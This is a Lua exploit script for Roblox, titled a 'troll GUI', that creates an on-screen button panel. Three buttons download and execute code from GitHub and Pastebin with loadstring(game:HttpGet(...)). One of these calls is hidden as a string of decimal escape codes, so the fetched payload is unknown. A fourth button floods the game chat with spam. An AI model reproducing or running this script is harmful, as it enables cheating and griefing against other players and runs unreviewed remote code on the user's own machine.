print("4NN1 TROLL GUI xDDD")

local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local ImageLabel = Instance.new("ImageLabel")
local Fedora = Instance.new("TextButton")
local Lag = Instance.new("TextButton")
local Energize = Instance.new("TextButton")
local Energize_2 = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")

--Properties:

ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 3
Frame.Position = UDim2.new(0.210592151, 0, 0.158402205, 0)
Frame.Size = UDim2.new(0, 318, 0, 290)
Frame.Active = true
Frame.Draggable = true

ImageLabel.Parent = Frame
ImageLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
ImageLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
ImageLabel.BorderSizePixel = 0
ImageLabel.Position = UDim2.new(0, 0, 0.168965518, 0)
ImageLabel.Size = UDim2.new(0, 318, 0, 241)
ImageLabel.Image = "http://www.roblox.com/asset/?id=1357958726"
ImageLabel.ImageTransparency = 0

Fedora.Name = "Fedora"
Fedora.Parent = ImageLabel
Fedora.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Fedora.BorderColor3 = Color3.fromRGB(0, 0, 0)
Fedora.Position = UDim2.new(0.0440251566, 0, 0.0995850638, 0)
Fedora.Size = UDim2.new(0, 107, 0, 50)
Fedora.Font = Enum.Font.SourceSans
Fedora.Text = "FE bypass gui by g00lxploit"
Fedora.TextColor3 = Color3.fromRGB(0, 0, 0)
Fedora.TextScaled = true
Fedora.TextSize = 14.000
Fedora.TextWrapped = true
Fedora.MouseButton1Down:Connect(function()
	loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")()
end)

Lag.Name = "Lag"
Lag.Parent = ImageLabel
Lag.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Lag.BorderColor3 = Color3.fromRGB(0, 0, 0)
Lag.Position = UDim2.new(0.628930807, 0, 0.0995850638, 0)
Lag.Size = UDim2.new(0, 107, 0, 50)
Lag.Font = Enum.Font.SourceSans
Lag.Text = "Chat Lag"
Lag.TextColor3 = Color3.fromRGB(0, 0, 0)
Lag.TextScaled = true
Lag.TextSize = 14.000
Lag.TextWrapped = true
Lag.MouseButton1Down:Connect(function()
	-- Made By Zerparoo

	local AmountOfMessages = 3
	local SafeMode = false
	local SafemodeWaitTime = 4

	if SafeMode then
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
		wait(SafemodeWaitTime)
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
		wait(SafemodeWaitTime)
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
	else
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
		game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer("TEAM DRAGOSTAR IS HERE!!12", "All")
	end
end)

Energize.Name = "Energize"
Energize.Parent = ImageLabel
Energize.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Energize.BorderColor3 = Color3.fromRGB(0, 0, 0)
Energize.Position = UDim2.new(0.0440251566, 0, 0.601659775, 0)
Energize.Size = UDim2.new(0, 107, 0, 50)
Energize.Font = Enum.Font.SourceSans
Energize.Text = "Infinite Yield GUI"
Energize.TextColor3 = Color3.fromRGB(0, 0, 0)
Energize.TextScaled = true
Energize.TextSize = 14.000
Energize.TextWrapped = true
Energize.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end)

Energize_2.Name = "Energize"
Energize_2.Parent = ImageLabel
Energize_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
Energize_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
Energize_2.Position = UDim2.new(0.628930807, 0, 0.601659775, 0)
Energize_2.Size = UDim2.new(0, 107, 0, 50)
Energize_2.Font = Enum.Font.SourceSans
Energize_2.Text = "FE Disabled Tools"
Energize_2.TextColor3 = Color3.fromRGB(0, 0, 0)
Energize_2.TextScaled = true
Energize_2.TextSize = 14.000
Energize_2.TextWrapped = true
Energize_2.MouseButton1Down:Connect(function()
	loadstring(game:HttpGet("https://pastebin.com/raw/AZVi2tuK"))()
end)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Size = UDim2.new(0, 318, 0, 50)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "Dragostar Troll Gui (DISC IS https://discord.gg/pA4Ez9Xx)"
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 27.000
